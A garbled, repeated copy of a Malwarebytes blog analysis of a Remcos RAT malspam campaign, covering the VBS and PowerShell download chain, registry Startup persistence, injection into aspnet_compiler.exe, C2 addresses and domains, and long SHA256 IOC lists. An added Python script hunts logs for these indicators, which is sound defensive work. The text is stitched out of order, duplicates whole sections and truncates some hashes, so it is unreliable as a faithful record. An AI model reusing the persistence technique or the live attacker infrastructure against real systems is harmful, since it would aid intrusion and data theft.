Because it has full control, Remcos is also able to download\r\nand execute additional software onto the system. This Remcos distribution utilizes a series of scripts that ultimately results\r\nin the injection of a Remcos payload into the Windows system binary aspnet_compiler.exe. A sample infection chain for\r\nthis variant is shown below:\r\nThe samples analyzed below originate from the attachment Appraisalreportl1100788392210.zip (SHA256\r\n4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a13bb23e). As with all analyzed samples, the the\r\ninfection chain followed the process flow above; the initial Visual Basic script initiates a series of download and execution\r\nof obfuscated scripts that eventually result in the injection of the final Remcos payload into aspnet_compiler.exe.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 12 of 42\n\nAlthough the script above is lengthy due to obfuscation, it ultimately amounts to the following simple powershell command\r\nwhich downloads and executes a second Visual Basic script:\r\nThe first downloaded script (ALL.TXT) also uses simple deobfuscation techniques to perform a few simple tasks. The\r\n$JUANADEARCO variable in this script contains Base64-encoded data which is decoded by the last line of the script (this\r\ndata is shown as decoded in the highlighted box in the image below). This script performs the following actions:\r\nCreates the directory C:UsersPublicRun\r\nDownloads Run_02_02_02.TXT (saved as C:UsersPublicRunRun.vbs)\r\nDownloads Lerveri.txt (saved as UsersPublicRun—–Run+++++++++.ps1)\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup to “C:UsersPublicRun”\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup to “C:UsersPublicRun”\r\nThe shell folder registry entries are legacy keys that are still existent for backwards compatibility. 
Setting the “Startup”\r\nvalue of these registry entries to the malware’s directory of execution effectively sets the contents of that directory to\r\nexecute upon system startup, ensuring persistence.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 13 of 42\n\nRun.vbs is obfuscated in a similar fashion to the initial Visual Basic script:\r\nThis script (deobfuscated below) is responsible only for execution the main powershell script which contains embedded\r\nbinaries, encoded in hex in plaintext.\r\nOne of the binaries encoded in —–Run+++++++++.ps1 is the Remcos payload which is loaded into the legitimate\r\nWindows binary aspnet_compiler.exe. The following function in the powershell script loads the Remcos PE into the binary:\r\nAlthough all of the analyzed Remcos samples of this campaign since January 2021 call back to the same IP address and port,\r\nno actual C2 traffic has been observed. All of the script downloads have pointed to addresses on the legitimate website\r\nus.archive.org, and the payloads have connected (though only via TCP handshake) to the IP address 185.19.85[.]168 on port\r\n8888.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 14 of 42\n\nBecause this IP address has not changed over several months, we investigated the passive DNS records to see if the\r\ninfrastructure may have been used in other recent attacks. We found that this IP address had the following resolutions over\r\nthe last few months:\r\nAddress First Seen Last Seen\r\nshugardaddy.ddns.net 26 May 21\r\nch-pool-1194.nvpn.to 24 May 21 30 June 21\r\ntippet.duckdns.org 13 May 21 16 May 21\r\nmail.swissauto.top 29 May 20 11 May 21\r\nrandyphoenix.hopto.org 4 April 21 14 April 21\r\nExamination of this IP address revealed several hosted services on multiple ports. 
The highlighted date range above is\r\ninteresting as it appears to be a mail server, and Spamhaus Zen classifies this address as blocked due to spam. Furthermore,\r\nanalysis also revealed that the #totalhash malware database contains malware associated with this address going back as far\r\nas 2013. Correlating additional malware associated with this address showed several other versions of Remcos samples\r\nconnecting to the same IP (many to shugardaddy.ddns.net port 5946) – a few recent samples are shown below:\r\nSHA256 Hash\r\nDate Last\r\nSeen\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1 6 Jul 21\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e 5 Jul 21\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a 29 Jun 21\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4 25 Jun 21\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2 25 Jun 21\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36 21 Jun 21\r\nOne identifying factor from this campaign is the use of us.archive.org to host payloads. Although this is not unique to\r\nmalware campaigns in general, it is unique to the Remcos campaigns we have analyzed – only the VBS method of\r\ndistribution has been observed to display this behavior.\r\nIn an analysis from Morphisec in March of this year, an HCrypt loader sample was analyzed that demonstrated a similar\r\ninfection chain to the Remcos samples discussed above. Although the stages and scripts are not identical, the intermediary\r\nsteps share a few similarities, such as the file names of the downloaded scripts ALL.txt, Server.txt, and in newer samples,\r\nBypass.txt. The scripts also have a few function names in common, but the HCrypt samples have anti-analysis and anti-virus\r\nevasion functionality not seen in the Remcos samples. 
Further research is required to determine whether this set of scripts is\r\na generically available package, or specific to a particular actor and being re-used across campaigns.\r\nAlthough the actor or group behind this campaign is not known, the sporadic nature of the emails distributing this malware\r\nsuggests that it could be targeted in nature. Remcos is a mature trojan that has evolved over many years; though the basic\r\ncapabilities have remained the same, the methodologies of distribution and installation continue to change. Because it is\r\nsoftware that can be purchased openly online, it is difficult to trace or attribute usage to a particular actor. However, given\r\nthe consistency of network infrastructure and installation methodology, it is possible that the motivation or actors behind\r\nthese attacks could be identified. Malwarebytes analysts continue to monitor and track this threat and will update detections\r\nand indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 15 of 42\n\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 
b1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560
ba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914
5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3
db01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad
109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10
a5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb
a465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200
d2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55
5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27
7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14
dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6

Related Remcos Samples:
15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1
0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e
8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a
22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4
898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2
d7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36
a80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026
1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc
4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce
c55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135
adf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8
59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91
1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac
a54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2
92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084
46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175
1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195
47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15
509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81
e06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e
109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10
0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906
a465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200
0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1
5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27
5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2

Other IOCs:
185.19.85.168
ia601401.us.archive.org
ia601502.us.archive.org
ia601405.us.archive.org
ia601406.us.archive.org
shugardaddy.ddns.net
ch-pool-1194.nvpn.to
tippet.duckdns.org
mail.swissauto.top
randyphoenix.hopto.org
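As an added example (not code from the original post or from Malwarebytes), the following Python script turns the network indicators listed above into a small hunting pass over proxy or DNS logs: a connection to 185.19.85[.]168 is rated high on the ports the post associates with it (8888 for the analyzed payloads, 5946 for the related samples), a lookup of any of the dynamic DNS hostnames (or a subdomain of one) is rated high, and a download from one of the us.archive.org item servers is rated low by default, because us.archive.org is a legitimate site, and medium only when the requested file name is one of the stage names the post mentions (ALL.txt, Run_02_02_02.TXT, Lerveri.txt, Server.txt, Bypass.txt). The indicators are written defanged and re-fanged in code, the way they usually arrive from a report. The log format, the sample lines, the documentation-range addresses (203.0.113.0/24) and the severity labels are constructed for illustration and are not from the post.

```python
"""Hunt proxy/DNS log lines for the Remcos campaign infrastructure listed above.

Added example, not code from the original post. The indicators are the ones
in the post's IOC list; the log format and the sample lines are constructed.
"""
import re
from urllib.parse import urlsplit

# Indicators from the post, kept defanged the way analysts usually share them.
IOC_IPS = {"185.19.85[.]168"}
IOC_HOSTS = {
    "shugardaddy.ddns[.]net",
    "ch-pool-1194.nvpn[.]to",
    "tippet.duckdns[.]org",
    "mail.swissauto[.]top",
    "randyphoenix.hopto[.]org",
}
# us.archive.org is a legitimate site: only the item servers seen hosting
# stages are listed, and a hit there stays low unless a stage name matches.
ARCHIVE_HOSTS = {
    "ia601401.us.archive.org",
    "ia601502.us.archive.org",
    "ia601405.us.archive.org",
    "ia601406.us.archive.org",
}
STAGE_NAMES = {"all.txt", "run_02_02_02.txt", "lerveri.txt", "server.txt", "bypass.txt"}
C2_PORTS = {8888, 5946}  # ports the post associates with 185.19.85[.]168


def refang(indicator: str) -> str:
    """Undo the usual defanging so an indicator can be compared with raw log data."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


IPS = {refang(i) for i in IOC_IPS}
HOSTS = {refang(h) for h in IOC_HOSTS}


def host_matches(host: str, iocs: set) -> bool:
    """True if host equals an indicator or is a subdomain of one (label-aligned)."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in iocs)


# Constructed log format: "<timestamp> <src-ip> <dst-ip>:<dst-port> <host> <url>",
# with "-" where a field is unknown (e.g. a bare TCP connection with no hostname).
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+):(?P<port>\d+) (?P<host>\S+) (?P<url>\S+)$"
)


def classify(line: str):
    """Return (severity, reason) for one log line, or None if nothing matches."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    dst, port, host, url = m["dst"], int(m["port"]), m["host"], m["url"]
    if dst in IPS:
        sev = "high" if port in C2_PORTS else "medium"
        return sev, f"connection to campaign C2 address {dst}:{port}"
    if host_matches(host, HOSTS):
        return "high", f"lookup of campaign hostname {host}"
    if host_matches(host, ARCHIVE_HOSTS):
        name = urlsplit(url).path.rsplit("/", 1)[-1].lower()
        if name in STAGE_NAMES:
            return "medium", f"stage file {name} fetched from {host}"
        return "low", f"download from us.archive.org item server {host} (legitimate site, review)"
    return None


def hunt(lines):
    """Return [(line, severity, reason)] for every line that matches an indicator."""
    return [(line, *hit) for line in lines if (hit := classify(line))]


# Constructed sample traffic from one workstation (10.0.0.23); the 203.0.113.0/24
# addresses are documentation-range placeholders, not real archive.org addresses.
SAMPLE_LOG = """\
2021-07-06T09:12:01Z 10.0.0.23 203.0.113.10:443 ia601401.us.archive.org https://ia601401.us.archive.org/12/items/example/ALL.txt
2021-07-06T09:12:04Z 10.0.0.23 185.19.85.168:8888 - -
2021-07-06T09:13:10Z 10.0.0.23 185.19.85.168:5946 shugardaddy.ddns.net -
2021-07-06T09:20:00Z 10.0.0.41 203.0.113.20:443 www.example.com https://www.example.com/
2021-07-06T09:25:30Z 10.0.0.23 203.0.113.10:443 ia601405.us.archive.org https://ia601405.us.archive.org/5/items/example/photo.jpg
"""

if __name__ == "__main__":
    for line, sev, why in hunt(SAMPLE_LOG.splitlines()):
        print(f"[{sev:6}] {why}")
```

Two design points are worth keeping when adapting this to real logs. First, the hostname match is label-aligned (`host.endswith("." + ioc)`), so `shugardaddy.ddns.net` and its subdomains match but an unrelated name that merely ends in the same characters does not. Second, the archive.org servers are deliberately not treated as a block-list: the post observed them hosting this campaign's script stages, but the same servers serve ordinary Internet Archive content, so a bare host match is only a prompt to review the request.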
Malwarebytes analysts continue to monitor and track this threat and will update detections\r\nand indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 33 of 42\n\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated 
Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther 
IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 34 of 42\n\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f104
63ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nThis blog post was authored by Erika Noerenberg\r\nIntroduction\r\nOver the past months, Malwarebytes researchers have been tracking a unique malspam campaign delivering the Remcos\r\nremote access trojan (RAT) via financially-themed emails. Remcos is often delivered via malicious documents or archive\r\nfiles containing scripts or executables. Like other RATs, Remcos gives the threat actor full control over the infected system\r\nand allows them to capture keystrokes, screenshots, credentials, or other sensitive system information. Unlike most RATs\r\nused by malicious actors however, Remcos is marketed as an administrative tool by the company Breaking Security which\r\nsells it openly on their website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 35 of 42\n\nDistribution\r\nRemcos often infects a system by embedding a specially-crafted settings file into an Office document, allowing an attacker\r\nto trick a user to run malicious code without additional notification. This variant of Remcos has been observed to be\r\ndistributed via targeted spam emails with an attached archive file. 
The emails and attachment names have been primarily\r\nfinancially-themed; an example email is shown below:\r\nFor illustration, the following table lists a sample of email subjects and attachment names from 2021 by date:\r\nDate Subject Attachment Name Contents\r\n21\r\nJan\r\nSeparate\r\nRemittance\r\nAdvice: paper\r\ndocument no –\r\n9604163\r\nPayment Advice.img Payment Advice.vbs\r\n26\r\nApr\r\nAppraisal Report\r\nfor your Loan\r\nApplication-11003354677341\r\nAppraisal.reportl1100335467734.zip\r\nAppraisal.vbs\r\nProperty.hta*\r\n18\r\nMay\r\nFwd: Appraisal\r\nReport for your\r\nLoan\r\nApplication-1100788392210\r\nAppraisalreportl1100788392210.zip Appraisal..vbs\r\n28\r\nJun\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11002214991\r\ntransaction_completed11003456773311..zip Report-Slip.vbs\r\n6 Jul\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11003456773312\r\ntransaction_completed11003456773312.zip\r\nReport-11003456773312.vbs\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 36 of 42\n\nIn most Remcos spam campaigns, the payload is an executable contained in an attached archive (.zip) or disk image (.img)\r\nfile, though malicious documents are also sometimes used. In this campaign however, the emails contain a zip archive\r\ncontaining a Visual Basic script (.vbs) which downloads and executes additional scripts and finally installs the Remcos\r\npayload.\r\n*Eariler versions also included a “Property.hta” file which only comprised the VB script wrapped in HTML as seen below.\r\nInterestingly, the body of this HTML consisted only of the text “demo”, which indicates this might have been test code.\r\nAnalysis\r\nRemcos is a fully-functioning RAT that gives the threat actor full control over the infected system and allows them to collect\r\nkeystrokes, audio, video, screenshots, and system information. 
Because it has full control, Remcos is also able to download\r\nand execute additional software onto the system. This Remcos distribution utilizes a series of scripts that ultimately results\r\nin the injection of a Remcos payload into the Windows system binary aspnet_compiler.exe. A sample infection chain for\r\nthis variant is shown below:\r\nThe samples analyzed below originate from the attachment Appraisalreportl1100788392210.zip (SHA256\r\n4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a13bb23e). As with all analyzed samples, the the\r\ninfection chain followed the process flow above; the initial Visual Basic script initiates a series of download and execution\r\nof obfuscated scripts that eventually result in the injection of the final Remcos payload into aspnet_compiler.exe.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 37 of 42\n\nAlthough the script above is lengthy due to obfuscation, it ultimately amounts to the following simple powershell command\r\nwhich downloads and executes a second Visual Basic script:\r\nThe first downloaded script (ALL.TXT) also uses simple deobfuscation techniques to perform a few simple tasks. The\r\n$JUANADEARCO variable in this script contains Base64-encoded data which is decoded by the last line of the script (this\r\ndata is shown as decoded in the highlighted box in the image below). This script performs the following actions:\r\nCreates the directory C:UsersPublicRun\r\nDownloads Run_02_02_02.TXT (saved as C:UsersPublicRunRun.vbs)\r\nDownloads Lerveri.txt (saved as UsersPublicRun—–Run+++++++++.ps1)\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup to “C:UsersPublicRun”\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup to “C:UsersPublicRun”\r\nThe shell folder registry entries are legacy keys that are still existent for backwards compatibility. 
Setting the “Startup”\r\nvalue of these registry entries to the malware’s directory of execution effectively sets the contents of that directory to\r\nexecute upon system startup, ensuring persistence.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 38 of 42\n\nRun.vbs is obfuscated in a similar fashion to the initial Visual Basic script:\r\nThis script (deobfuscated below) is responsible only for execution the main powershell script which contains embedded\r\nbinaries, encoded in hex in plaintext.\r\nOne of the binaries encoded in —–Run+++++++++.ps1 is the Remcos payload which is loaded into the legitimate\r\nWindows binary aspnet_compiler.exe. The following function in the powershell script loads the Remcos PE into the binary:\r\nAlthough all of the analyzed Remcos samples of this campaign since January 2021 call back to the same IP address and port,\r\nno actual C2 traffic has been observed. All of the script downloads have pointed to addresses on the legitimate website\r\nus.archive.org, and the payloads have connected (though only via TCP handshake) to the IP address 185.19.85[.]168 on port\r\n8888.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 39 of 42\n\nBecause this IP address has not changed over several months, we investigated the passive DNS records to see if the\r\ninfrastructure may have been used in other recent attacks. We found that this IP address had the following resolutions over\r\nthe last few months:\r\nAddress First Seen Last Seen\r\nshugardaddy.ddns.net 26 May 21\r\nch-pool-1194.nvpn.to 24 May 21 30 June 21\r\ntippet.duckdns.org 13 May 21 16 May 21\r\nmail.swissauto.top 29 May 20 11 May 21\r\nrandyphoenix.hopto.org 4 April 21 14 April 21\r\nExamination of this IP address revealed several hosted services on multiple ports. 
The highlighted date range above is\r\ninteresting as it appears to be a mail server, and Spamhaus Zen classifies this address as blocked due to spam. Furthermore,\r\nanalysis also revealed that the #totalhash malware database contains malware associated with this address going back as far\r\nas 2013. Correlating additional malware associated with this address showed several other versions of Remcos samples\r\nconnecting to the same IP (many to shugardaddy.ddns.net port 5946) – a few recent samples are shown below:\r\nSHA256 Hash\r\nDate Last\r\nSeen\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1 6 Jul 21\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e 5 Jul 21\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a 29 Jun 21\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4 25 Jun 21\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2 25 Jun 21\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36 21 Jun 21\r\nOne identifying factor from this campaign is the use of us.archive.org to host payloads. Although this is not unique to\r\nmalware campaigns in general, it is unique to the Remcos campaigns we have analyzed – only the VBS method of\r\ndistribution has been observed to display this behavior.\r\nIn an analysis from Morphisec in March of this year, an HCrypt loader sample was analyzed that demonstrated a similar\r\ninfection chain to the Remcos samples discussed above. Although the stages and scripts are not identical, the intermediary\r\nsteps share a few similarities, such as the file names of the downloaded scripts ALL.txt, Server.txt, and in newer samples,\r\nBypass.txt. The scripts also have a few function names in common, but the HCrypt samples have anti-analysis and anti-virus\r\nevasion functionality not seen in the Remcos samples. 
